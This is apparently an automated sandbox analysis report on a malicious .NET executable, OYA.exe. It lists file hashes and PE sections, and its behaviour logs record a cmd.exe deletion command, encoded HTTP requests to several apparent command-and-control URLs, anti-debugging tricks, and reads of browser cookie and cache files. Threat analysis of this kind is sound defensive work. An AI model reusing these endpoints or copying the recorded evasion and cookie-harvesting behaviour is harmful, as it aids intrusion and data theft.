MalScore
100/100
OYA.exe
File details Download PDF Report | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 485.50 KB (497152 bytes) |
Compile time: | 2019-08-17 01:46:01 |
MD5: | 444d3df9a20c68281353a091f76428e3 |
SHA1: | b8659dab04ea1120bc696a1ee43b5d3022f830a5 |
SHA256: | c222b07df99688f8ba5c35ce475d970b9fd0597420061d42707b553d00c788aa |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 3 | import resource relocation |
First submission: | 2019-10-02 18:24:03 |
Last submission: | 2019-10-02 18:24:03 |
Filename detected: |
- OYA.exe (1) |
URL file hosting |
---|
hXXp://gnomingroam.com/OYA.exe![]() |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2019-10-02 13:46:35 | [24/57] | ![]() |
PE Sections 2 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x74de4 | 478720 | d2954914fce631a226878cdb123b62b7 | 43f7c5e6bf10f0d0a6dafe30ada8b8b3c48f8c2b |
.rsrc | 0x78000 | 0x42dc | 17408 | dd0f78073f92419087b4521d3ebf689f | 02179abc2b65310d1cb2a26c57ce8fc8a64b8a91 |
.reloc | 0x7e000 | 0xc | 512 | 8b648646fc755374e409cd806b02511e | b7d6e63d75f933c54eb8906963973f3321788164 |
Meta Info | |
---|---|
No Meta found in this file |
XOR | |
---|---|
No XOR informations found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
FIle type: Library | |
mscoree.dll | |
KERNEL32.dll |
IP Found | |
---|---|
No IP detected |
URL(s) | |
---|---|
http://u@ |
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven03b_64 | Seven03b_64 | VirtualBox | 2019-10-02 18:22:52 | 2019-10-02 18:26:00 | 188 |
14 Behaviors detected by system signatures
Uses suspicious command line tools or Windows utilities
Severity: High
Confidence: High
- command: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: SURICATA HTTP Unexpected Request body
- signature: Traffico Anomalo: Traffico verso host malevolo, GET HTTP Content "db" (Soc-Rule)
Attempts to repeatedly call a single API many times in order to delay analysis time
Severity: High
Confidence: Very High
- Spam: services.exe (480) called API GetSystemTimeAsFileTime 3998116 times
Uses Windows utilities for basic functionality
Severity: Medium
Confidence: High
- command: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Anomalous .NET characteristics
Severity: Medium
Confidence: Very High
- anomalous_version: Assembly version is set to 0
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.58, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00074e00, virtual_size: 0x00074de4
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://www.scaker.com/um/?9r4P2=+yOKJmfs2AUMMiwIhJjF3ftzrHyWcdWbdT8U21VoR7BW7cK2j+HNvQ6sQGRkAxI0XcLNdYEE&EjU4Sp=gdMTH2gx8L
- url: http://www.elitebailbondsusa.com/um/?9r4P2=Qjy3Ds5k/vwdFyAd46eH0AOkOn69t7s0X4jH9b4DK144hM5chcKp7Y4vxR1j/5vWTK3vV/FG&EjU4Sp=gdMTH2gx8L
- url: http://www.elitebailbondsusa.com/um/
- url: http://www.uttarpooja.com/um/?9r4P2=CxZVpHYzJNUG4WBJDB+9hVcdm/CcImSiVYRw0i31HAcCqWjvJTuzgpiEv5Q7UHpjcxdX80Yn&EjU4Sp=gdMTH2gx8L
- url: http://www.uttarpooja.com/um/
- url: http://www.techpriors.com/um/?9r4P2=vxZWQMXcZO4+Y6uzGa76l/ygsZvTD2dIxSiuG+HN73QNmpUNIFI+I9F2y7hhJU1677/pwtnZ&EjU4Sp=gdMTH2gx8L
- url: http://www.techpriors.com/um/
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://www.scaker.com/um/?9r4P2=+yOKJmfs2AUMMiwIhJjF3ftzrHyWcdWbdT8U21VoR7BW7cK2j+HNvQ6sQGRkAxI0XcLNdYEE&EjU4Sp=gdMTH2gx8L
- suspicious_request: http://www.elitebailbondsusa.com/um/?9r4P2=Qjy3Ds5k/vwdFyAd46eH0AOkOn69t7s0X4jH9b4DK144hM5chcKp7Y4vxR1j/5vWTK3vV/FG&EjU4Sp=gdMTH2gx8L
- suspicious_request: http://www.elitebailbondsusa.com/um/
- suspicious_request: http://www.uttarpooja.com/um/?9r4P2=CxZVpHYzJNUG4WBJDB+9hVcdm/CcImSiVYRw0i31HAcCqWjvJTuzgpiEv5Q7UHpjcxdX80Yn&EjU4Sp=gdMTH2gx8L
- suspicious_request: http://www.uttarpooja.com/um/
- suspicious_request: http://www.techpriors.com/um/?9r4P2=vxZWQMXcZO4+Y6uzGa76l/ygsZvTD2dIxSiuG+HN73QNmpUNIFI+I9F2y7hhJU1677/pwtnZ&EjU4Sp=gdMTH2gx8L
- suspicious_request: http://www.techpriors.com/um/
A process created a hidden window
Severity: Medium
Confidence: Very High
- Process: systray.exe -> C:\Windows\SysWOW64\cmd.exe
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
- DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
- DynamicLoader: ADVAPI32.dll/RegEnumValueW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: mscoreei.dll/RegisterShimImplCallback
- DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
- DynamicLoader: mscoreei.dll/SetShellShimInstance
- DynamicLoader: mscoreei.dll/OnShimDllMainCalled
- DynamicLoader: mscoreei.dll/_CorExeMain_RetAddr
- DynamicLoader: mscoreei.dll/_CorExeMain
- DynamicLoader: SHLWAPI.dll/UrlIsW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: clr.dll/SetRuntimeInfo
- DynamicLoader: clr.dll/_CorExeMain
- DynamicLoader: MSCOREE.DLL/CreateConfigStream
- DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream
- DynamicLoader: KERNEL32.dll/GetNumaHighestNodeNumber
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/AddSIDToBoundaryDescriptor
- DynamicLoader: KERNEL32.dll/CreateBoundaryDescriptorW
- DynamicLoader: KERNEL32.dll/CreatePrivateNamespaceW
- DynamicLoader: KERNEL32.dll/OpenPrivateNamespaceW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/DeleteBoundaryDescriptor
- DynamicLoader: KERNEL32.dll/WerRegisterRuntimeExceptionModule
- DynamicLoader: KERNEL32.dll/RaiseException
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: mscoreei.dll/
- DynamicLoader: KERNELBASE.dll/SetSystemFileCacheSize
- DynamicLoader: ntdll.dll/NtSetSystemInformation
- DynamicLoader: KERNELBASE.dll/PrivIsDllSynchronizationHeld
- DynamicLoader: KERNEL32.dll/AddDllDirectory
- DynamicLoader: KERNEL32.dll/SortGetHandle
- DynamicLoader: KERNEL32.dll/SortCloseHandle
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: ole32.dll/CoGetContextToken
- DynamicLoader: clrjit.dll/sxsJitStartup
- DynamicLoader: clrjit.dll/getJit
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/LocaleNameToLCID
- DynamicLoader: gdiplus.dll/GdiplusStartup
- DynamicLoader: KERNEL32.dll/IsProcessorFeaturePresent
- DynamicLoader: USER32.dll/GetWindowInfo
- DynamicLoader: USER32.dll/GetAncestor
- DynamicLoader: USER32.dll/GetMonitorInfoA
- DynamicLoader: USER32.dll/EnumDisplayMonitors
- DynamicLoader: USER32.dll/EnumDisplayDevicesA
- DynamicLoader: GDI32.dll/ExtTextOutW
- DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
- DynamicLoader: gdiplus.dll/GdipLoadImageFromStream
- DynamicLoader: MSCOREE.DLL/GetProcessExecutableHeap
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
- DynamicLoader: WindowsCodecs.dll/DllGetClassObject
- DynamicLoader: KERNEL32.dll/WerRegisterMemoryBlock
- DynamicLoader: gdiplus.dll/GdipImageForceValidation
- DynamicLoader: gdiplus.dll/GdipGetImageType
- DynamicLoader: gdiplus.dll/GdipGetImageRawFormat
- DynamicLoader: gdiplus.dll/GdipGetImageWidth
- DynamicLoader: gdiplus.dll/GdipGetImageHeight
- DynamicLoader: gdiplus.dll/GdipBitmapGetPixel
- DynamicLoader: gdiplus.dll/GdipDisposeImage
- DynamicLoader: KERNEL32.dll/LCIDToLocaleName
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/GetUserPreferredUILanguages
- DynamicLoader: shell32.dll/SHGetFolderPath
- DynamicLoader: shell32.dll/SHGetFolderPathW
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: KERNEL32.dll/GetFullPathName
- DynamicLoader: KERNEL32.dll/GetFullPathNameW
- DynamicLoader: KERNEL32.dll/SetThreadErrorMode
- DynamicLoader: KERNEL32.dll/GetFileAttributesEx
- DynamicLoader: KERNEL32.dll/GetFileAttributesExW
- DynamicLoader: KERNEL32.dll/VirtualAlloc
- DynamicLoader: KERNEL32.dll/LocalAlloc
- DynamicLoader: KERNEL32.dll/WideCharToMultiByte
- DynamicLoader: ADVAPI32.dll/CryptAcquireContextW
- DynamicLoader: ADVAPI32.dll/CryptCreateHash
- DynamicLoader: ADVAPI32.dll/CryptDecrypt
- DynamicLoader: ADVAPI32.dll/CryptDeriveKey
- DynamicLoader: ADVAPI32.dll/CryptDestroyHash
- DynamicLoader: ADVAPI32.dll/CryptDestroyKey
- DynamicLoader: ADVAPI32.dll/CryptHashData
- DynamicLoader: ADVAPI32.dll/CryptReleaseContext
- DynamicLoader: USER32.dll/MessageBoxA
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: apphelp.dll/ApphelpCheckRunAppEx
- DynamicLoader: apphelp.dll/ApphelpQueryModuleDataEx
- DynamicLoader: apphelp.dll/ApphelpParseModuleData
- DynamicLoader: apphelp.dll/ApphelpCreateAppcompatData
- DynamicLoader: apphelp.dll/SdbInitDatabaseEx
- DynamicLoader: apphelp.dll/SdbReleaseDatabase
- DynamicLoader: apphelp.dll/SdbUnpackAppCompatData
- DynamicLoader: apphelp.dll/SdbQueryContext
- DynamicLoader: ole32.dll/CoUninitialize
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: KERNEL32.dll/CreateActCtxW
- DynamicLoader: KERNEL32.dll/AddRefActCtx
- DynamicLoader: KERNEL32.dll/ReleaseActCtx
- DynamicLoader: KERNEL32.dll/ActivateActCtx
- DynamicLoader: KERNEL32.dll/DeactivateActCtx
- DynamicLoader: KERNEL32.dll/GetCurrentActCtx
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: uxtheme.dll/ThemeInitApiHook
- DynamicLoader: USER32.dll/IsProcessDPIAware
- DynamicLoader: MLANG.dll/
- DynamicLoader: WININET.dll/FindFirstUrlCacheEntryA
- DynamicLoader: kernel32.dll/SetFileInformationByHandle
- DynamicLoader: SHELL32.dll/SHGetFolderPathW
- DynamicLoader: urlmon.dll/CreateUri
- DynamicLoader: kernel32.dll/InitializeSRWLock
- DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
- DynamicLoader: kernel32.dll/AcquireSRWLockShared
- DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
- DynamicLoader: kernel32.dll/ReleaseSRWLockShared
- DynamicLoader: kernel32.dll/InitializeSRWLock
- DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
- DynamicLoader: kernel32.dll/AcquireSRWLockShared
- DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
- DynamicLoader: kernel32.dll/ReleaseSRWLockShared
- DynamicLoader: WININET.dll/FindNextUrlCacheEntryA
- DynamicLoader: WININET.dll/FindCloseUrlCache
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
- DynamicLoader: USER32.dll/GetWindowInfo
- DynamicLoader: USER32.dll/GetAncestor
- DynamicLoader: USER32.dll/GetMonitorInfoA
- DynamicLoader: USER32.dll/EnumDisplayMonitors
- DynamicLoader: USER32.dll/EnumDisplayDevicesA
- DynamicLoader: GDI32.dll/ExtTextOutW
- DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
- DynamicLoader: WindowsCodecs.dll/DllGetClassObject
- DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: kernel32.dll/SetThreadUILanguage
- DynamicLoader: kernel32.dll/CopyFileExW
- DynamicLoader: kernel32.dll/IsDebuggerPresent
- DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
Creates RWX memory
Severity: Medium
Confidence: Medium
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven03b_64 | Seven03b_64 | VirtualBox | 2019-10-02 18:22:52 | 2019-10-02 18:26:00 | 188 |
10 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\OYA.exe.config C:\Users\Seven01\AppData\Local\Temp\OYA.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\* C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll \Device\KsecDD C:\Windows\assembly\NativeImages_v4.0.30319_32\fZpTGnZlLRiusntuma\* C:\Users\Seven01\AppData\Local\Temp\OYA.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll C:\Users\Seven01\AppData\Local\Temp\OYA.exe.Local\ C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80 C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Users\Seven01\AppData\Local\Temp\WeakReference weakReference = == List.FindLastIndex.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\AppPatch\sysmain.sdb C:\Windows\Microsoft.NET\Framework\v4.0.30319\ C:\Windows C:\Windows\Microsoft.NET\Framework\v4.0.30319\*.* C:\Windows\Microsoft.NET\Framework\v4.0.30319\ui\SwDRM.dll C:\Windows\SysWOW64\ntdll.dll C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies C:\Users\Seven01\AppData\Local\Microsoft\Windows\History C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\ C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\ C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Windows\SysWOW64\systray.exe.Local\ C:\Users\Seven01\AppData\Roaming\J94P8C89\J94logim.jpeg C:\ C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Temp C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\OYA.exe.config C:\Users\Seven01\AppData\Local\Temp\OYA.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\AppPatch\sysmain.sdb C:\Windows\Microsoft.NET\Framework\v4.0.30319\ C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\ntdll.dll C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat 